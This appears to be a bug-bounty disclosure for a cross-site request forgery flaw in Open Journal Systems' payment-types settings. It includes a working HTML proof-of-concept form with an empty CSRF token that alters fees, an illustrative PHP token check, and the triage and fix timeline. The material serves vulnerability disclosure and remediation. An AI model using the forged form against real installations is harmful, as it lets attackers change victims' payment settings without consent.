CSRF in Payment Types in pkp/ojs


Reported on

Oct 8th 2023


CSRF in Payment Types

Proof of Concept

1. Attacker sends a fake form to the user

           <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/payments/savePaymentTypes" method="POST">
           <!-- csrfToken is deliberately left empty: the endpoint did not reject it -->
           <input type="hidden" name="csrfToken" value="" />
           <input type="hidden" name="publicationFee" value="3" />
           <input type="hidden" name="purchaseIssueFee" value="3" />
           <input type="hidden" name="purchaseArticleFee" value="3" />
           <input type="hidden" name="restrictOnlyPdf" value="3" />
           <input type="hidden" name="membershipFee" value="3" />
           <input type="hidden" name="submitFormButton" value="1" />
           <input type="submit" value="Submit request" />
           </form>
           <script>
           history.pushState('', '', '/');
           </script>

2. User clicks, and unwanted payment types are edited

Video Poc


Payload Poc



Traps users from performing unwanted actions
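For contrast, a server-side check of the kind that defeats this PoC, added here as an illustration (not OJS code and not the fix commit; the function names and the session/array handling are assumptions):

```php
<?php
// Added illustration, not OJS code: a per-session CSRF token that the
// payment-types handler must see before it saves anything.
declare(strict_types=1);

// Issue a token once per session and keep it server-side (assumed session array).
function csrfTokenForSession(array &$session): string
{
    if (empty($session['csrfToken'])) {
        $session['csrfToken'] = bin2hex(random_bytes(32));
    }
    return $session['csrfToken'];
}

// True only when a non-empty string token matches the session token in
// constant time. The PoC form submits csrfToken="" and is rejected here.
function csrfTokenIsValid(array $session, array $post): bool
{
    $expected  = $session['csrfToken'] ?? '';
    $submitted = $post['csrfToken'] ?? '';
    if ($expected === '' || !is_string($submitted) || $submitted === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Hypothetical handler for the form fields named in the PoC.
function savePaymentTypes(array $session, array $post): array
{
    if (!csrfTokenIsValid($session, $post)) {
        return ['status' => 403, 'error' => 'Invalid or missing CSRF token'];
    }
    $saved = [];
    foreach (['publicationFee', 'purchaseIssueFee', 'purchaseArticleFee', 'membershipFee'] as $f) {
        $saved[$f] = (float) ($post[$f] ?? 0);
    }
    $saved['restrictOnlyPdf'] = !empty($post['restrictOnlyPdf']);
    return ['status' => 200, 'saved' => $saved];
}

// Constructed demo: a forged POST with an empty token versus a legitimate one.
$session = [];
$token   = csrfTokenForSession($session);
$forged  = ['csrfToken' => '',     'publicationFee' => '3', 'submitFormButton' => '1'];
$legit   = ['csrfToken' => $token, 'publicationFee' => '3', 'submitFormButton' => '1'];
echo 'forged request status: ', savePaymentTypes($session, $forged)['status'], "\n";
echo 'legitimate request status: ', savePaymentTypes($session, $legit)['status'], "\n";
```

Rejecting the empty token is the same check that rejects a missing or stale one, so the hardened handler cannot be driven by a cross-site form regardless of which field values it carries.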

We are processing your report and will contact the pkp/ojs team within 24 hours. 5 months ago
HaiNguyen modified the report
5 months ago
We have contacted a member of the pkp/ojs team and are waiting to hear back 5 months ago
4 months ago


Hi, any new update?

4 months ago


Sorry, I cannot report the same vulnerability more than once. The system doesn't allow that. This leaves me with an approximate choice of vulnerability. I also couldn't find the correct Occurrences link. Hope you understand. Thanks.

Alec Smecher modified the Severity from Medium (6.3) to Low (3.5) 4 months ago
Alec Smecher
4 months ago


@admin, this has been filed in the wrong repository; it should be in pkp/ojs rather than pkp/pkp-lib. Can you change the repo? (9407)

Ben Harvie
4 months ago


The repository has been updated as requested.

Alec Smecher modified the CWE from Missing Authorization to Cross-Site Request Forgery (CSRF) 4 months ago
The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Alec Smecher validated this vulnerability 4 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alec Smecher marked this as fixed in 3.3.0-16 with commit 99a9f3 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago